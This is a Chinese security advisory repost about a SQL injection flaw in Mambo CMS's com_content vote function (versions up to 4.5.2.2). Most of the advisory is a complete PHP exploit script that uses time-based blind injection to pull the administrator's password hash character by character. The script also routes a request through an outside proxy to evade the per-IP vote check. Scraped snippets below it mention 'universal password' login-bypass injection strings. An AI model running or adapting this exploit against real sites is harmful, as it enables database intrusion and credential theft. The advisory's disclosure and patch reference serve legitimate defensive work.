发布日期:2005-06-16更新日期:2005-06-16受影响系统:

Mambo Mambo Open Source <= 4.5.2.2不受影响系统:

Mambo Mambo Open Source 4.5.2.3描述:

BUGTRAQ  ID: 13966Mambo是一款开放源代码的WEB内容管理系统。Mambo的com_contents中存在严重的SQL注入漏洞,远程攻击者可能利用此漏洞非法操作数据库。  -- content.php --  100             case 'vote':  101                     recordVote ( $url , $user_rating , $cid ,  $database);  102                     break;  ...  1478                                    $query = "UPDATE  #__content_rating"  1479                                    . "\n SET rating_count =  rating_count + 1,"  1450                                    . "\n rating_sum = rating_sum  + $user_rating,"  1451                                    . "\n lastip = '$currip'"  1452                                    . "\n WHERE content_id = ". $cid  1453                                    ;  ----------------在1450行$user_rating未经任何验证便使用用户提供的数据,导致用户可以获得敏感信息。测试方法:

警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!*/if (!(function_exists('curl_init'))) {    echo "cURL extension required\n";    exit;}ini_set("max_execution_time","999999");$benchcount = 150000;$aid= 62;$cid = 2;$charmap = array (48,49,50,51,52,53,54,55,56,57,          97,98,99,100,101,102,          103,104,105,          106,107,108,109,110,111,112,113,          114,115,116,117,118,119,120,121,122          );          if($argv[1]){        $url = $argv[1];    if ($argv[2])        $aid = $argv[2];    if ($argv[3])        $benchcount = $argv[3];    if ($argv[4])        $proxy = $argv[4]; }else {    echo "Usage: ".$argv[0]." [userid] [benchmarkcount] [proxy]\n\n";    echo "\tURL\t URL to mambo site (ex: http://127.0.0.1)\n";    echo "\taid\t userid to get  (default: 62 (admin))\n";    echo "\tbenchmarkcount\t benchmark count  (default: 150000)\n";    echo "\tproxy\t optional proxy url  (ex: http://10.10.10.10:8080)\n";     exit;}// rate from different ip (using http://projectbypass.com)$projectbypass = "http://projectbypass.com/nph-proxy3.cgi/010110A/";$ch = curl_init();curl_setopt($ch, CURLOPT_URL,$projectbypass.str_replace("://","/",$url)."/index.php?op \tion=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1"); curl_setopt($ch, \CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);curl_close ($ch);// standard page loading time$start = time();$ch = curl_init();if ($proxy){    curl_setopt($ch, CURLOPT_PROXY,$proxy); }curl_setopt($ch, CURLOPT_URL,$url);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);$res  = curl_exec($ch);curl_close ($ch);$stop = time();$sloadtime = floatval($stop - $start);echo "standard page loading =".$sloadtime."\n"; // benchmark page loading time$start = time();$ch = curl_init();if ($proxy){    curl_setopt($ch, CURLOPT_PROXY,$proxy); }curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Itemid \=1&cid=$cid&user_rating=1,rating_sum=(select+1+from+mos_users+where+if(2>1,benchmark($ \benchcount,md5(1)),1))+where+content_id=$cid/*"); curl_setopt($ch, \CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);curl_close ($ch);$stop = time();$bloadtime = floatval($stop - $start);echo "bencmark page loading =".$bloadtime."\n"; // check if SQL query failedif (ereg("DB function failed",$res)){    echo "[x] mysql < 4.1 detected - not exploitable\n";    exit();}if ($bloadtime <= $sloadtime + 2){    echo "[x] increase your benchmark count\n";    exit();}echo "Take your time for Teh Tarik... please wait ...\n\n";echo "Result:\n";echo "\tUserid = $aid\n";echo "\tPassword Hash = ";// starting fetch password$benchcount = $benchcount*2;        for($i= 1;$i< 33;$i++){     foreach ($charmap as $char){        $start = time();        echo chr($char);        $ch = curl_init();        if ($proxy){            curl_setopt($ch, CURLOPT_PROXY,$proxy);         }        curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Item \id=1&cid=$cid&user_rating=1,rating_sum=(select+password+from+mos_users+where+id=$aid+a \nd+if(ascii(substring(password,$i,1))=$char,benchmark($benchcount,md5(1)),1))+where+co \ntent_id=$cid/*");  curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);        $res=curl_exec ($ch);        curl_close ($ch);        $stop = time();        $xloadtime = floatval($stop - $start);        if (floatval($xloadtime) > $bloadtime){            $hash .= chr($char);            break 1;        }        else {            echo chr(8);        }                if ($char == 103){            echo "\n\n\tNot Vulnerable or Something wrong occur ...\n";            exit;        }            }}echo "\n";?>建议:

厂商补丁:Mambo-----目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载4.5.2.3版本:http://mamboforge.net/frs/download.php/6151/MamboV4.5.2.3-stable.tar.g z

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

mambo 服务商规定的mysql密码,Mambo com_content远程SQL注入漏洞相关推荐

  1. mysql注入漏洞语句,web安全之sql注入漏洞

    概念 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.通俗地讲,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力 ...

  2. 绕过waf mysql爆库_iwebsec刷题记录-SQL注入漏洞

    被推荐了这个web平台,感觉挺适合新手的,网上搜了下没看到有人写wp,这里本入门萌新来稍微整理下自己解题的过程 SQL注入漏洞 01-数字型注入 http://localhost:32774/sqli ...

  3. 【Mysql优化安全】防止sql注入

    [Mysql安全]防止sql注入 (1)什么是sql注入 (2)寻找sql注入的方法 (3)mybatis是如何做到防止sql注入的 (3.1)sql对比 (3.2)简单分析 (3.3)底层实现原理 ...

  4. 米拓5.3 mysql支持off,Metinfo 5.3.17 前台SQL注入漏洞分析

    Metinfo 8月1日升级了版本,修复了一个影响小于等于5.3.17版本(几乎可以追溯到所有5.x版本)的SQL注入漏洞.这个SQL注入漏洞不受软WAF影响,可以直接获取数据,影响较广. 漏洞出现在 ...

  5. 【安全】【SQL注入漏洞】通过sql注入获取数据库管理员密码

    本博客中使用封神台靶标系统进行演示,靶标系统网站. 一.判断网站是否存在sql注入漏洞 1.在地址栏写入?id=1 and 1=1,回车 页面返回正常. 2.在地址栏写入?id=1 and 1=2,回 ...

  6. php mysql 注入漏洞_PHP安全:SQL注入漏洞防护

    原标题:PHP安全:SQL注入漏洞防护 SQL注入是最危险的漏洞之一,但也是最好防护的漏洞之一.本文介绍在PHP的编码中合理地使用MySQL提供的预编译进行SQL注入防护,在PHP中使用PHP数据对象 ...

  7. MySQL攻略 - JDBC程序SQL注入,PreparedStatement接口详解与案例练习,JDBC相关API小结

    文章目录 SQL注入 Statement详解 基本介绍 Navicat演示SQL注入 JDBC演示SQL注入 PreparedStatement详解 基本介绍 预处理好处 预处理案例(selete语句 ...

  8. mysql sql注入漏洞修复_从Java角度修复SQL注入漏洞

    很多情况因为过滤不严导致很多网站存在sql注入,这里以用户登陆为例,简单举例 首先创建一个测试的数据库 比较基础,不写创建过程了 java代码如下: packagecn.basic.jdbc;impo ...

  9. php万能注入密码,php下的SQL注入万能用户名和密码

    1.针对有单引号的情况 : 万能密码 : select * from users where username='xxxx' and password='xxxxxx' or 1='1'; 万能用户名 ...

最新文章

  1. VScode 插件、配置记录
  2. MySQL字符串截取函数
  3. android导航条高度修改,Android中修改TabLayout底部导航条Indicator长短的方法
  4. Java HashMap工作原理深入探讨
  5. 最后关于nginx+passenger+ror+mysql的安装部署过程
  6. Cisco IOS防火墙的安全规则和配置方案
  7. AvtiveMQ与SpringBoot结合
  8. 常用的流式布局FlowLayout
  9. php后缀名隐藏,php隐藏后缀名的方法是什么
  10. python3----字典
  11. Delphi 小知识汇总
  12. CISCO 路由器启动自动配置
  13. 【语音编码】基于matlab ADPCM编解码【含Matlab源码 553期】
  14. 人体姿态识别研究综述(详细归纳!)
  15. php 获取客户端的浏览器信息
  16. mysql存储视频_特殊格式文件(视频、声音等) 在数据库中的存储方式
  17. 树形导航栏(折叠)(jquery)
  18. ue4+html5动态加载pak,UE4 pak生成和加载
  19. Tiled游戏地图编辑器
  20. 【从零开始学深度学习编译器】九,TVM的CodeGen流程

热门文章

  1. 最个性创意的圣诞礼物 忆恋拼图
  2. AWS Lambda 搭配 Amazon API Gateway (HTTP API)
  3. 29款最好用的数据可视化工具推荐
  4. wincc上位机与1200组态步骤_博途v13的wincc能组态上位机吗
  5. ESP32 LVGL8.1 ——Style bg 设置样式背景 (Style 2)
  6. 【nowcoder 217127】炼金术师
  7. IIS 7的配置问题
  8. [S32K]FreeRTOS使用
  9. 深入理解python元类
  10. 专网通信行业检测及认证服务介绍